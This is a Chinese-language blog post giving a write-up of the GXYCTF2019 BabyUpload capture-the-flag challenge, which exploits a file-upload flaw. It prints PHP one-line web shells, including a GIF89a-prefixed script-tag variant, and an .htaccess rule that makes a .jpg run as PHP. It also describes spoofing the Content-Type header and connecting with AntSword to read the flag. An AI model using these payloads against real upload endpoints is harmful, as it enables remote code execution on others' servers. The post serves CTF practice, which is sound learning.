[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

VbopV8oITVrmVxfgl7m216LdB2cXUz0ATXRrpzviz3I

打开靶场看到个上传文件的选项,应该是上传文件漏洞

上传个一句话木马文件尝试

<?php eval($_POST['cmd']);?>

提示不能带有php的后缀

xUGXT4IawvjNVGDm4F_6Fl4gU6m7W17Gm0kkfalH3tM

改成jpg后缀,提示“上传类型也太露骨了吧!”

lhofAr1SHgSle84irZUHTm5D2FPLXU9kzFIOuFbi0CQ

修改了Content-Type为image/jpeg还是不行

6b3WwFK8OW-UCaPCFvJPB1T5osW_FfzDP92w56jDaqk

换了一种一句话木马

GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

此时上传成功

Dx9Y3KADP--mHJKwZwF5M3dUGIS1IwWCI_rBz1o1eKM

但是图片无法解析为php

使用.htaccess将文件解析为php

<FilesMatch "d.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这里注意还是需要修改下Content-Type,否则还是会提示上传类型露骨

-ax6rOcU1HIzm49oTyuXIh31X2Dafr1KLttZFecRZrg

然后再上传一句话木马

yx0bF_HWYwvN_MkHkl1mLz7ykKvdDSsIfdmZ1Oq9IRA

此时通过蚁剑连接,在根目录下找到flag

71x23U4ATlq2Ga50X0qx3vpXePna6Olx_J2xJrGg3Hc

RLIU76K4_xvKmlQElkJEdaVhswkS-52Wl14dPSe4LF4

posted on 2024-01-12 16:21  跳河离去的鱼  阅读(189)  评论(0编辑  收藏  举报